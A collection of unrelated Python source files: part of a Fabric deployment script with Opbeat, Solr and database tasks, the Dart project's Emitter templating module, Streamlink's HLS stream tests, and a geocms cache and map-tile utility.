'curl https://intake.opbeat.com/api/v1/'
'organizations/$OPBEAT_ORGANIZATION_ID/'
'apps/$OPBEAT_APP_ID/releases/ \
-H "Authorization: Bearer $OPBEAT_SECRET_TOKEN" \
-d rev={commit} \
-d branch={branch} \
-d status=completed'
.format(
commit=commit, branch=branch
)
)
@task
def inspectdb(filename=""):
"""Inspection database.
Allows the inspection of legacy databases inside Django projects.
Args:
filename(str): Name output file.
Usage:
>>> fab environment:vagrant inspectdb
Print the models needed to work with the database
>>> fab environment:vagrant inspectdb:'filename'
Use 'filename' as the output file.
"""
with virtualenv():
if(filename == ""):
run('python manage.py inspectdb')
else:
run(join('python manage.py inspectdb > ', filename))
# Haystack index tasks
@task
def rebuild_index():
"""
rebuilds index for haystack search_indexes.
"""
with virtualenv():
run('python manage.py rebuild_index --noinput')
# Solr tasks
@task
def run_solr():
"""
Starts the Sorl demo search engine.
"""
update_solr_schema()
require('solr_dir')
with cd(env.solr_dir):
run('java -jar start.jar')
@task
def update_solr_schema():
"""
Replaces project schema file into local solr.
"""
require('solr_dir', 'site_dir')
command = (
'cp {}templates/search_configuration/solr.xml '
'{}solr/collection1/conf/schema.xml'
).format(
env.site_dir,
env.solr_dir
)
run(command)
@task
def replace_solr_schema(core):
"""
Replaces solr schema for the given environment.
example:
- fab environment:solr replace_solr_schema:staging
- fab environment:solr replace_solr_schema:production
"""
require('schema_remote_path', "schema_local_path")
put(
env.schema_local_path,
env.schema_remote_path[core]
)
run('sudo systemctl restart solr')
@task
def dropdb():
"""Drop database.
Drop database without create it again
Usage:
>>>fab environment:vagrant dropdb.
"""
urun('dropdb knowledge_base')
|
|
#!/usr/bin/python
# Copyright (c) 2011, the Dart project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
"""Templating to help generate structured text."""
import logging
import re
_logger = logging.getLogger('emitter')
def Format(template, **parameters):
"""Create a string using the same template syntax as Emitter.Emit."""
e = Emitter()
e._Emit(template, parameters)
return ''.join(e.Fragments())
class Emitter(object):
"""An Emitter collects string fragments to be assembled into a single string.
"""
def __init__(self, bindings=None):
self._items = [] # A new list
self._bindings = bindings or Emitter.Frame({}, None)
def EmitRaw(self, item):
"""Emits literal string with no substitition."""
self._items.append(item)
def Emit(self, template_source, **parameters):
"""Emits a template, substituting named parameters and returning emitters to
fill the named holes.
Ordinary substitution occurs at $NAME or $(NAME). If there is no parameter
called NAME, the text is left as-is. So long as you don't bind FOO as a
parameter, $FOO in the template will pass through to the generated text.
Substitution of $?NAME and $(?NAME) yields an empty string if NAME is not a
parameter.
Values passed as named parameters should be strings or simple integral
values (int or long).
Named holes are created at $!NAME or $(!NAME). A hole marks a position in
the template that may be filled in later. An Emitter is returned for each
named hole in the template. The holes are filled by emitting to the
corresponding emitter.
Emit returns either a single Emitter if the template contains one hole or a
tuple of emitters for several holes, in the order that the holes occur in
the template.
The emitters for the holes remember the parameters passed to the initial
call to Emit. Holes can be used to provide a binding context.
"""
return self._Emit(template_source, parameters)
def _Emit(self, template_source, parameters):
"""Implementation of Emit, with map in place of named parameters."""
template = self._ParseTemplate(template_source)
parameter_bindings = self._bindings.Extend(parameters)
hole_names = template._holes
if hole_names:
hole_map = {}
replacements = {}
for name in hole_names:
emitter = Emitter(parameter_bindings)
replacements[name] = emitter._items
hole_map[name] = emitter
full_bindings = parameter_bindings.Extend(replacements)
else:
full_bindings = parameter_bindings
self._ApplyTemplate(template, full_bindings)
# Return None, a singleton or tuple of the hole names.
if not hole_names:
return None
if len(hole_names) == 1:
return hole_map[hole_names[0]]
else:
return tuple(hole_map[name] for name in hole_names)
def Fragments(self):
"""Returns a list of all the string fragments emitted."""
def _FlattenTo(item, output):
if isinstance(item, list):
for subitem in item:
_FlattenTo(subitem, output)
elif isinstance(item, Emitter.DeferredLookup):
value = item._environment.Lookup(item._lookup._name,
item._lookup._value_if_missing)
_FlattenTo(value, output)
else:
output.append(str(item))
output = []
_FlattenTo(self._items, output)
return output
def Bind(self, var, template_source, **parameters):
"""Adds a binding for var to this emitter."""
template = self._ParseTemplate(template_source)
if template._holes:
raise RuntimeError('Cannot have holes in Emitter.Bind')
bindings = self._bindings.Extend(parameters)
value = Emitter(bindings)
value._ApplyTemplate(template, bindings)
self._bindings = self._bindings.Extend({var: value._items})
return value
def _ParseTemplate(self, source):
"""Converts the template string into a Template object."""
# TODO(sra): Cache the parsing.
items = []
holes = []
# Break source into a sequence of text fragments and substitution lookups.
pos = 0
while True:
match = Emitter._SUBST_RE.search(source, pos)
if not match:
items.append(source[pos:])
break
text_fragment = source[pos:match.start()]
if text_fragment:
items.append(text_fragment)
pos = match.end()
term = match.group()
name = match.group(1) or match.group(2) # $NAME and $(NAME)
if name:
item = Emitter.Lookup(name, term, term)
items.append(item)
continue
name = match.group(3) or match.group(4) # $!NAME and $(!NAME)
if name:
item = Emitter.Lookup(name, term, term)
items.append(item)
holes.append(name)
continue
name = match.group(5) or match.group(6) # $?NAME and $(?NAME)
if name:
item = Emitter.Lookup(name, term, '')
items.append(item)
holes.append(name)
continue
raise RuntimeError('Unexpected group')
if len(holes) != len(set(holes)):
raise RuntimeError('Cannot have repeated holes %s' % holes)
return Emitter.Template(items, holes)
_SUBST_RE = re.compile(
# $FOO $(FOO) $!FOO $(!FOO) $?FOO $(?FOO)
r'\$(\w+)|\$\((\w+)\)|\$!(\w+)|\$\(!(\w+)\)|\$\?(\w+)|\$\(\?(\w+)\)')
def _ApplyTemplate(self, template, bindings):
"""Emits the items from the parsed template."""
result = []
for item in template._items:
if isinstance(item, str):
if item:
result.append(item)
elif isinstance(item, Emitter.Lookup):
# Bind lookup to the current environment (bindings)
# TODO(sra): More space efficient to do direct lookup.
result.append(Emitter.DeferredLookup(item, bindings))
else:
raise RuntimeError('Unexpected template element')
# Collected fragments are in a sublist, so self._items contains one element
# (sublist) per template application.
self._items.append(result)
class Lookup(object):
"""An element of a parsed template."""
def __init__(self, name, original, default):
self._name = name
self._original = original
self._value_if_missing = default
class DeferredLookup(object):
"""A lookup operation that is deferred until final string generation."""
# TODO(sra): A deferred lookup will be useful when we add expansions that
# have behaviour condtional on the contents, e.g. adding separators between
# a list of items.
def __init__(self, lookup, environment):
self._lookup = lookup
self._environment = environment
class Template(object):
"""A parsed template."""
def __init__(self, items, holes):
self._items = items # strings and lookups
self._holes = holes
class Frame(object):
"""A Frame is a set of bindings derived from a parent."""
def __init__(self, map, parent):
self._map = map
self._parent = parent
def Lookup(self, name, default):
if name in self._map:
return self._map[name]
if self._parent:
return self._parent.Lookup(name, default)
return default
def Extend(self, map):
return Emitter.Frame(map, self)
|
|
import os
import typing
import unittest
from threading import Event
from unittest.mock import Mock, call, patch
import pytest
import requests_mock
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from streamlink.session import Streamlink
from streamlink.stream.hls import HLSStream, HLSStreamReader
from tests.mixins.stream_hls import EventedHLSStreamWriter, Playlist, Segment, Tag, TestMixinStreamHLS
from tests.resources import text
class EncryptedBase:
def __init__(self, num, key, iv, *args, padding=b"", append=b"", **kwargs):
super().__init__(num, *args, **kwargs)
aesCipher = AES.new(key, AES.MODE_CBC, iv)
padded = self.content + padding if padding else pad(self.content, AES.block_size, style="pkcs7")
self.content_plain = self.content
self.content = aesCipher.encrypt(padded) + append
class TagMap(Tag):
def __init__(self, num, namespace, attrs=None):
self.path = f"map{num}"
self.content = f"[map{num}]".encode("ascii")
super().__init__("EXT-X-MAP", {
"URI": self.val_quoted_string(self.url(namespace)),
**(attrs or {})
})
class TagMapEnc(EncryptedBase, TagMap):
pass
class TagKey(Tag):
path = "encryption.key"
def __init__(self, method="NONE", uri=None, iv=None, keyformat=None, keyformatversions=None):
attrs = {"METHOD": method}
if uri is not False: # pragma: no branch
attrs.update({"URI": lambda tag, namespace: tag.val_quoted_string(tag.url(namespace))})
if iv is not None: # pragma: no branch
attrs.update({"IV": self.val_hex(iv)})
if keyformat is not None: # pragma: no branch
attrs.update({"KEYFORMAT": self.val_quoted_string(keyformat)})
if keyformatversions is not None: # pragma: no branch
attrs.update({"KEYFORMATVERSIONS": self.val_quoted_string(keyformatversions)})
super().__init__("EXT-X-KEY", attrs)
self.uri = uri
def url(self, namespace):
return self.uri.format(namespace=namespace) if self.uri else super().url(namespace)
class SegmentEnc(EncryptedBase, Segment):
pass
class TestHLSStreamRepr(unittest.TestCase):
def test_repr(self):
session = Streamlink()
stream = HLSStream(session, "https://foo.bar/playlist.m3u8")
self.assertEqual(repr(stream), "<HLSStream('https://foo.bar/playlist.m3u8', None)>")
stream = HLSStream(session, "https://foo.bar/playlist.m3u8", "https://foo.bar/master.m3u8")
self.assertEqual(repr(stream), "<HLSStream('https://foo.bar/playlist.m3u8', 'https://foo.bar/master.m3u8')>")
class TestHLSVariantPlaylist(unittest.TestCase):
@classmethod
def get_master_playlist(cls, playlist):
with text(playlist) as pl:
return pl.read()
def subject(self, playlist, options=None):
with requests_mock.Mocker() as mock:
url = "http://mocked/{0}/master.m3u8".format(self.id())
content = self.get_master_playlist(playlist)
mock.get(url, text=content)
session = Streamlink(options)
return HLSStream.parse_variant_playlist(session, url)
def test_variant_playlist(self):
streams = self.subject("hls/test_master.m3u8")
self.assertEqual(
list(streams.keys()),
["720p", "720p_alt", "480p", "360p", "160p", "1080p (source)", "90k"],
"Finds all streams in master playlist"
)
self.assertTrue(
all([isinstance(stream, HLSStream) for stream in streams.values()]),
"Returns HLSStream instances"
)
class EventedHLSReader(HLSStreamReader):
__writer__ = EventedHLSStreamWriter
class EventedHLSStream(HLSStream):
__reader__ = EventedHLSReader
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHLSStream(TestMixinStreamHLS, unittest.TestCase):
def get_session(self, options=None, *args, **kwargs):
session = super().get_session(options)
session.set_option("hls-live-edge", 3)
return session
def test_offset_and_duration(self):
thread, segments = self.subject([
Playlist(1234, [Segment(0), Segment(1, duration=0.5), Segment(2, duration=0.5), Segment(3)], end=True)
], streamoptions={"start_offset": 1, "duration": 1})
data = self.await_read(read_all=True)
self.assertEqual(data, self.content(segments, cond=lambda s: 0 < s.num < 3), "Respects the offset and duration")
self.assertTrue(all(self.called(s) for s in segments.values() if 0 < s.num < 3), "Downloads second and third segment")
self.assertFalse(any(self.called(s) for s in segments.values() if 0 > s.num > 3), "Skips other segments")
def test_map(self):
discontinuity = Tag("EXT-X-DISCONTINUITY")
map1 = TagMap(1, self.id())
map2 = TagMap(2, self.id())
self.mock("GET", self.url(map1), content=map1.content)
self.mock("GET", self.url(map2), content=map2.content)
thread, segments = self.subject([
Playlist(0, [map1, Segment(0), Segment(1), Segment(2), Segment(3)]),
Playlist(4, [map1, Segment(4), map2, Segment(5), Segment(6), discontinuity, Segment(7)], end=True)
])
data = self.await_read(read_all=True, timeout=None)
self.assertEqual(data, self.content([
map1, segments[1], map1, segments[2], map1, segments[3],
map1, segments[4], map2, segments[5], map2, segments[6], segments[7]
]))
self.assertTrue(self.called(map1, once=True), "Downloads first map only once")
self.assertTrue(self.called(map2, once=True), "Downloads second map only once")
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHLSStreamByterange(TestMixinStreamHLS, unittest.TestCase):
__stream__ = EventedHLSStream
# The dummy segments in the error tests are required because the writer's run loop would otherwise continue forever
# due to the segment's future result being None (no requests result), and we can't await the end of the stream
# without waiting for the stream's timeout error. The dummy segments ensure that we can call await_write for these
# successful segments, so we can close the stream afterwards and safely make the test assertions.
# The EventedHLSStreamWriter could also implement await_fetch, but this is unnecessarily more complex than it already is.
@patch("streamlink.stream.hls.log")
def test_unknown_offset(self, mock_log: Mock):
thread, _ = self.subject([
Playlist(0, [
Tag("EXT-X-BYTERANGE", "3"), Segment(0),
Segment(1)
], end=True)
])
self.await_write(2 - 1)
self.thread.close()
self.assertEqual(mock_log.error.call_args_list, [
call("Failed to fetch segment 0: Missing BYTERANGE offset")
])
self.assertFalse(self.called(Segment(0)))
@patch("streamlink.stream.hls.log")
def test_unknown_offset_map(self, mock_log: Mock):
map1 = TagMap(1, self.id(), {"BYTERANGE": "\"1234\""})
self.mock("GET", self.url(map1), content=map1.content)
thread, _ = self.subject([
Playlist(0, [
Segment(0),
map1,
Segment(1)
], end=True)
])
self.await_write(3 - 1)
self.thread.close()
self.assertEqual(mock_log.error.call_args_list, [
call("Failed to fetch map for segment 1: Missing BYTERANGE offset")
])
self.assertFalse(self.called(map1))
@patch("streamlink.stream.hls.log")
def test_invalid_offset_reference(self, mock_log: Mock):
thread, _ = self.subject([
Playlist(0, [
Tag("EXT-X-BYTERANGE", "3@0"), Segment(0),
Segment(1),
Tag("EXT-X-BYTERANGE", "5"), Segment(2),
Segment(3)
], end=True)
])
self.await_write(4 - 1)
self.thread.close()
self.assertEqual(mock_log.error.call_args_list, [
call("Failed to fetch segment 2: Missing BYTERANGE offset")
])
self.assertEqual(self.mocks[self.url(Segment(0))].last_request._request.headers["Range"], "bytes=0-2")
self.assertFalse(self.called(Segment(2)))
def test_offsets(self):
map1 = TagMap(1, self.id(), {"BYTERANGE": "\"1234@0\""})
map2 = TagMap(2, self.id(), {"BYTERANGE": "\"42@1337\""})
self.mock("GET", self.url(map1), content=map1.content)
self.mock("GET", self.url(map2), content=map2.content)
s1, s2, s3, s4, s5 = Segment(0), Segment(1), Segment(2), Segment(3), Segment(4)
self.subject([
Playlist(0, [
map1,
Tag("EXT-X-BYTERANGE", "5@3"), s1,
Tag("EXT-X-BYTERANGE", "7"), s2,
map2,
Tag("EXT-X-BYTERANGE", "11"), s3,
Tag("EXT-X-BYTERANGE", "17@13"), s4,
Tag("EXT-X-BYTERANGE", "19"), s5,
], end=True)
])
self.await_write(5 * 2)
self.await_read(read_all=True)
self.assertEqual(self.mocks[self.url(map1)].last_request._request.headers["Range"], "bytes=0-1233")
self.assertEqual(self.mocks[self.url(map2)].last_request._request.headers["Range"], "bytes=1337-1378")
self.assertEqual(self.mocks[self.url(s1)].last_request._request.headers["Range"], "bytes=3-7")
self.assertEqual(self.mocks[self.url(s2)].last_request._request.headers["Range"], "bytes=8-14")
self.assertEqual(self.mocks[self.url(s3)].last_request._request.headers["Range"], "bytes=15-25")
self.assertEqual(self.mocks[self.url(s4)].last_request._request.headers["Range"], "bytes=13-29")
self.assertEqual(self.mocks[self.url(s5)].last_request._request.headers["Range"], "bytes=30-48")
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHLSStreamEncrypted(TestMixinStreamHLS, unittest.TestCase):
__stream__ = EventedHLSStream
def get_session(self, options=None, *args, **kwargs):
session = super().get_session(options)
session.set_option("hls-live-edge", 3)
session.set_option("http-headers", {"X-FOO": "BAR"})
return session
def gen_key(self, aes_key=None, aes_iv=None, method="AES-128", uri=None, keyformat="identity", keyformatversions=1):
aes_key = aes_key or os.urandom(16)
aes_iv = aes_iv or os.urandom(16)
key = TagKey(method=method, uri=uri, iv=aes_iv, keyformat=keyformat, keyformatversions=keyformatversions)
self.mock("GET", key.url(self.id()), content=aes_key)
return aes_key, aes_iv, key
def test_hls_encrypted_aes128(self):
aesKey, aesIv, key = self.gen_key()
# noinspection PyTypeChecker
thread, segments = self.subject([
Playlist(0, [key] + [SegmentEnc(num, aesKey, aesIv) for num in range(0, 4)]),
Playlist(4, [key] + [SegmentEnc(num, aesKey, aesIv) for num in range(4, 8)], end=True)
])
self.await_write(3 + 4)
data = self.await_read(read_all=True)
expected = self.content(segments, prop="content_plain", cond=lambda s: s.num >= 1)
self.assertEqual(data, expected, "Decrypts the AES-128 identity stream")
self.assertTrue(self.called(key, once=True), "Downloads encryption key only once")
self.assertEqual(self.get_mock(key).last_request._request.headers.get("X-FOO"), "BAR")
self.assertFalse(any(self.called(s) for s in segments.values() if s.num < 1), "Skips first segment")
self.assertTrue(all(self.called(s) for s in segments.values() if s.num >= 1), "Downloads all remaining segments")
self.assertEqual(self.get_mock(segments[1]).last_request._request.headers.get("X-FOO"), "BAR")
def test_hls_encrypted_aes128_with_map(self):
aesKey, aesIv, key = self.gen_key()
map1 = TagMapEnc(1, namespace=self.id(), key=aesKey, iv=aesIv)
map2 = TagMapEnc(2, namespace=self.id(), key=aesKey, iv=aesIv)
self.mock("GET", self.url(map1), content=map1.content)
self.mock("GET", self.url(map2), content=map2.content)
# noinspection PyTypeChecker
thread, segments = self.subject([
Playlist(0, [key, map1] + [SegmentEnc(num, aesKey, aesIv) for num in range(0, 2)]),
Playlist(2, [key, map2] + [SegmentEnc(num, aesKey, aesIv) for num in range(2, 4)], end=True)
])
self.await_write(2 * 2 + 2 * 2)
data = self.await_read(read_all=True)
self.assertEqual(data, self.content([
map1, segments[0], map1, segments[1], map2, segments[2], map2, segments[3]
], prop="content_plain"))
def test_hls_encrypted_aes128_key_uri_override(self):
aesKey, aesIv, key = self.gen_key(uri="http://real-mocked/{namespace}/encryption.key?foo=bar")
aesKeyInvalid = bytes([ord(aesKey[i:i + 1]) ^ 0xFF for i in range(16)])
_, __, key_invalid = self.gen_key(aesKeyInvalid, aesIv, uri="http://mocked/{namespace}/encryption.key?foo=bar")
# noinspection PyTypeChecker
thread, segments = self.subject([
Playlist(0, [key_invalid] + [SegmentEnc(num, aesKey, aesIv) for num in range(0, 4)]),
Playlist(4, [key_invalid] + [SegmentEnc(num, aesKey, aesIv) for num in range(4, 8)], end=True)
], options={"hls-segment-key-uri": "{scheme}://real-{netloc}{path}?{query}"})
self.await_write(3 + 4)
data = self.await_read(read_all=True)
expected = self.content(segments, prop="content_plain", cond=lambda s: s.num >= 1)
self.assertEqual(data, expected, "Decrypts stream from custom key")
self.assertFalse(self.called(key_invalid), "Skips encryption key")
self.assertTrue(self.called(key, once=True), "Downloads custom encryption key")
self.assertEqual(self.get_mock(key).last_request._request.headers.get("X-FOO"), "BAR")
@patch("streamlink.stream.hls.log")
def test_hls_encrypted_aes128_incorrect_block_length(self, mock_log):
aesKey, aesIv, key = self.gen_key()
# noinspection PyTypeChecker
thread, segments = self.subject([
Playlist(0, [key] + [
SegmentEnc(0, aesKey, aesIv, append=b"?" * 1),
SegmentEnc(1, aesKey, aesIv, append=b"?" * (AES.block_size - 1))
], end=True)
])
self.await_write(2)
data = self.await_read(read_all=True)
expected = self.content(segments, prop="content_plain")
self.assertEqual(data, expected, "Removes garbage data from segments")
self.assertIn(call("Cutting off 1 bytes of garbage before decrypting"), mock_log.debug.mock_calls)
self.assertIn(call("Cutting off 15 bytes of garbage before decrypting"), mock_log.debug.mock_calls)
def test_hls_encrypted_aes128_incorrect_padding_length(self):
aesKey, aesIv, key = self.gen_key()
padding = b"\x00" * (AES.block_size - len(b"[0]"))
self.subject([
Playlist(0, [key, SegmentEnc(0, aesKey, aesIv, padding=padding)], end=True)
])
# close read thread early
self.thread.close()
with self.assertRaises(ValueError) as cm:
self.await_write()
self.assertEqual(str(cm.exception), "Padding is incorrect.", "Crypto.Util.Padding.unpad exception")
def test_hls_encrypted_aes128_incorrect_padding_content(self):
aesKey, aesIv, key = self.gen_key()
padding = (b"\x00" * (AES.block_size - len(b"[0]") - 1)) + bytes([AES.block_size])
self.subject([
Playlist(0, [key, SegmentEnc(0, aesKey, aesIv, padding=padding)], end=True)
])
# close read thread early
self.thread.close()
with self.assertRaises(ValueError) as cm:
self.await_write()
self.assertEqual(str(cm.exception), "PKCS#7 padding is incorrect.", "Crypto.Util.Padding.unpad exception")
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHlsPlaylistReloadTime(TestMixinStreamHLS, unittest.TestCase):
segments = [
Segment(0, duration=11),
Segment(1, duration=7),
Segment(2, duration=5),
Segment(3, duration=3)
]
def get_session(self, options=None, reload_time=None, *args, **kwargs):
return super().get_session(dict(options or {}, **{
"hls-live-edge": 3,
"hls-playlist-reload-time": reload_time
}))
def subject(self, *args, **kwargs):
thread, segments = super().subject(start=False, *args, **kwargs)
# mock the worker thread's _playlist_reload_time method, so that the main thread can wait on its call
playlist_reload_time_called = Event()
orig_playlist_reload_time = thread.reader.worker._playlist_reload_time
def mocked_playlist_reload_time(*args, **kwargs):
playlist_reload_time_called.set()
return orig_playlist_reload_time(*args, **kwargs)
# immediately kill the writer thread as we don't need it and don't want to wait for its queue polling to end
def mocked_futures_get():
return None, None
with patch.object(thread.reader.worker, "_playlist_reload_time", side_effect=mocked_playlist_reload_time), \
patch.object(thread.reader.writer, "_futures_get", side_effect=mocked_futures_get):
self.start()
if not playlist_reload_time_called.wait(timeout=5): # pragma: no cover
raise RuntimeError("Missing _playlist_reload_time() call")
# wait for the worker thread to terminate, so that deterministic assertions can be done about the reload time
thread.reader.worker.join()
return thread.reader.worker.playlist_reload_time
def test_hls_playlist_reload_time_default(self):
time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="default")
self.assertEqual(time, 4, "default sets the reload time to the playlist's target duration")
def test_hls_playlist_reload_time_segment(self):
time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="segment")
self.assertEqual(time, 3, "segment sets the reload time to the playlist's last segment")
def test_hls_playlist_reload_time_segment_no_segments(self):
time = self.subject([Playlist(0, [], end=True, targetduration=4)], reload_time="segment")
self.assertEqual(time, 4, "segment sets the reload time to the targetduration if no segments are available")
def test_hls_playlist_reload_time_segment_no_segments_no_targetduration(self):
time = self.subject([Playlist(0, [], end=True, targetduration=0)], reload_time="segment")
self.assertEqual(time, 6, "sets reload time to 6 seconds when no segments and no targetduration are available")
def test_hls_playlist_reload_time_live_edge(self):
time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="live-edge")
self.assertEqual(time, 8, "live-edge sets the reload time to the sum of the number of segments of the live-edge")
def test_hls_playlist_reload_time_live_edge_no_segments(self):
time = self.subject([Playlist(0, [], end=True, targetduration=4)], reload_time="live-edge")
self.assertEqual(time, 4, "live-edge sets the reload time to the targetduration if no segments are available")
def test_hls_playlist_reload_time_live_edge_no_segments_no_targetduration(self):
time = self.subject([Playlist(0, [], end=True, targetduration=0)], reload_time="live-edge")
self.assertEqual(time, 6, "sets reload time to 6 seconds when no segments and no targetduration are available")
def test_hls_playlist_reload_time_number(self):
time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="2")
self.assertEqual(time, 2, "number values override the reload time")
def test_hls_playlist_reload_time_number_invalid(self):
time = self.subject([Playlist(0, self.segments, end=True, targetduration=4)], reload_time="0")
self.assertEqual(time, 4, "invalid number values set the reload time to the playlist's targetduration")
def test_hls_playlist_reload_time_no_target_duration(self):
time = self.subject([Playlist(0, self.segments, end=True, targetduration=0)], reload_time="default")
self.assertEqual(time, 8, "uses the live-edge sum if the playlist is missing the targetduration data")
def test_hls_playlist_reload_time_no_data(self):
time = self.subject([Playlist(0, [], end=True, targetduration=0)], reload_time="default")
self.assertEqual(time, 6, "sets reload time to 6 seconds when no data is available")
@patch("streamlink.stream.hls.log")
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHlsPlaylistParseErrors(TestMixinStreamHLS, unittest.TestCase):
__stream__ = EventedHLSStream
class FakePlaylist(typing.NamedTuple):
is_master: bool = False
iframes_only: bool = False
class InvalidPlaylist(Playlist):
def build(self, *args, **kwargs):
return "invalid"
def test_generic(self, mock_log):
self.subject([self.InvalidPlaylist()])
self.assertEqual(self.await_read(read_all=True), b"")
self.await_close()
self.assertTrue(self.thread.reader.buffer.closed, "Closes the stream on initial playlist parsing error")
self.assertEqual(mock_log.debug.mock_calls, [call("Reloading playlist")])
self.assertEqual(mock_log.error.mock_calls, [call("Missing #EXTM3U header")])
def test_reload(self, mock_log):
thread, segments = self.subject([
Playlist(1, [Segment(0)]),
self.InvalidPlaylist(),
self.InvalidPlaylist(),
Playlist(2, [Segment(2)], end=True)
])
self.await_write(2)
data = self.await_read(read_all=True)
self.assertEqual(data, self.content(segments))
self.close()
self.await_close()
self.assertEqual(mock_log.warning.mock_calls, [
call("Failed to reload playlist: Missing #EXTM3U header"),
call("Failed to reload playlist: Missing #EXTM3U header")
])
@patch("streamlink.stream.hls.HLSStreamWorker._reload_playlist", Mock(return_value=FakePlaylist(is_master=True)))
def test_is_master(self, mock_log):
self.subject([Playlist()])
self.assertEqual(self.await_read(read_all=True), b"")
self.await_close()
self.assertTrue(self.thread.reader.buffer.closed, "Closes the stream on initial playlist parsing error")
self.assertEqual(mock_log.debug.mock_calls, [call("Reloading playlist")])
self.assertEqual(mock_log.error.mock_calls, [
call(f"Attempted to play a variant playlist, use 'hls://{self.stream.url}' instead")
])
@patch("streamlink.stream.hls.HLSStreamWorker._reload_playlist", Mock(return_value=FakePlaylist(iframes_only=True)))
def test_iframes_only(self, mock_log):
self.subject([Playlist()])
self.assertEqual(self.await_read(read_all=True), b"")
self.await_close()
self.assertTrue(self.thread.reader.buffer.closed, "Closes the stream on initial playlist parsing error")
self.assertEqual(mock_log.debug.mock_calls, [call("Reloading playlist")])
self.assertEqual(mock_log.error.mock_calls, [call("Streams containing I-frames only are not playable")])
@patch('streamlink.stream.hls.FFMPEGMuxer.is_usable', Mock(return_value=True))
class TestHlsExtAudio(unittest.TestCase):
@property
def playlist(self):
with text("hls/test_2.m3u8") as pl:
return pl.read()
def run_streamlink(self, playlist, audio_select=None):
streamlink = Streamlink()
if audio_select:
streamlink.set_option("hls-audio-select", audio_select)
master_stream = HLSStream.parse_variant_playlist(streamlink, playlist)
return master_stream
def test_hls_ext_audio_not_selected(self):
master_url = "http://mocked/path/master.m3u8"
with requests_mock.Mocker() as mock:
mock.get(master_url, text=self.playlist)
master_stream = self.run_streamlink(master_url)['video']
with pytest.raises(AttributeError):
master_stream.substreams
assert master_stream.url == 'http://mocked/path/playlist.m3u8'
def test_hls_ext_audio_en(self):
"""
m3u8 with ext audio but no options should not download additional streams
:return:
"""
master_url = "http://mocked/path/master.m3u8"
expected = ['http://mocked/path/playlist.m3u8', 'http://mocked/path/en.m3u8']
with requests_mock.Mocker() as mock:
mock.get(master_url, text=self.playlist)
master_stream = self.run_streamlink(master_url, 'en')
substreams = master_stream['video'].substreams
result = [x.url for x in substreams]
# Check result
self.assertEqual(result, expected)
def test_hls_ext_audio_es(self):
"""
m3u8 with ext audio but no options should not download additional streams
:return:
"""
master_url = "http://mocked/path/master.m3u8"
expected = ['http://mocked/path/playlist.m3u8', 'http://mocked/path/es.m3u8']
with requests_mock.Mocker() as mock:
mock.get(master_url, text=self.playlist)
master_stream = self.run_streamlink(master_url, 'es')
substreams = master_stream['video'].substreams
result = [x.url for x in substreams]
# Check result
self.assertEqual(result, expected)
def test_hls_ext_audio_all(self):
"""
m3u8 with ext audio but no options should not download additional streams
:return:
"""
master_url = "http://mocked/path/master.m3u8"
expected = ['http://mocked/path/playlist.m3u8', 'http://mocked/path/en.m3u8', 'http://mocked/path/es.m3u8']
with requests_mock.Mocker() as mock:
mock.get(master_url, text=self.playlist)
master_stream = self.run_streamlink(master_url, 'en,es')
substreams = master_stream['video'].substreams
result = [x.url for x in substreams]
# Check result
self.assertEqual(result, expected)
def test_hls_ext_audio_wildcard(self):
master_url = "http://mocked/path/master.m3u8"
expected = ['http://mocked/path/playlist.m3u8', 'http://mocked/path/en.m3u8', 'http://mocked/path/es.m3u8']
with requests_mock.Mocker() as mock:
mock.get(master_url, text=self.playlist)
master_stream = self.run_streamlink(master_url, '*')
substreams = master_stream['video'].substreams
result = [x.url for x in substreams]
# Check result
self.assertEqual(result, expected)
|
|
import os
import math
from django.conf import settings
from osgeo import osr
from pysqlite2 import dbapi2 as db
from hashlib import md5
from collections import OrderedDict
import sh
import logging
from terrapyn.geocms import dispatch
_log = logging.getLogger('terrapyn.driver_messages')
CACHE_ROOT = getattr(settings, 'CACHE_ROOT', settings.MEDIA_ROOT)
LAYER_CACHE_PATH = getattr(settings, "LAYER_CACHE_PATH", os.path.join(CACHE_ROOT, '.cache', 'layers'))
if not os.path.exists(CACHE_ROOT):
sh.mkdir('-p', CACHE_ROOT)
if not os.path.exists(LAYER_CACHE_PATH):
sh.mkdir('-p', LAYER_CACHE_PATH)
def data_cache_path(page, page_id_field='slug'):
"""
Get (and make) local data cache path for data
:param page:
:return:
"""
path = os.path.join(CACHE_ROOT, '.cache', 'data', *os.path.split(getattr(page, page_id_field)))
if not os.path.exists(path):
sh.mkdir('-p', path)
return path
def delete_data_cache(page, page_id_field='slug'):
path = data_cache_path(page, page_id_field)
sh.rm('-rf', path)
def trim_cache(layers=list(), styles=list()):
"""destroy relevant tile caches and cached mapnik files that are affected by a style or layer change"""
names = []
data = db.connect(os.path.join(LAYER_CACHE_PATH, 'directory.sqlite'))
c = data.cursor()
c.executemany('select basename from layers where slug=?', layers)
names.extend( c.fetchall() )
c.close()
c = data.cursor()
c.executemany('select basename from styles where slug=?', styles)
names.extend( c.fetchall() )
for name in names:
if os.path.exists(name + '.mbtiles'):
os.unlink(name + '.mbtiles')
if os.path.exists(name + '.json'):
os.unlink(name + '.json')
if os.path.exists(name + '.wmsresults'):
os.unlink(name + '.wmsresults')
if os.path.exists(name + '.mml'):
os.unlink(name + '.mml')
if os.path.exists(name + '.xml'):
os.unlink(name + '.xml')
if os.path.exists(name + '.carto'):
os.unlink(name + '.carto')
### following procedures and functions are in support of the tiled mapping services, TMS
def deg2num(lat_deg, lon_deg, zoom):
"""
degree to tile number
:param lat_deg: degrees lon
:param lon_deg: degrees lat
:param zoom: web mercator zoom level
:return: x, y tile coordinates as a tuple
"""
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad))) / math.pi) / 2.0 * n)
return (xtile, ytile)
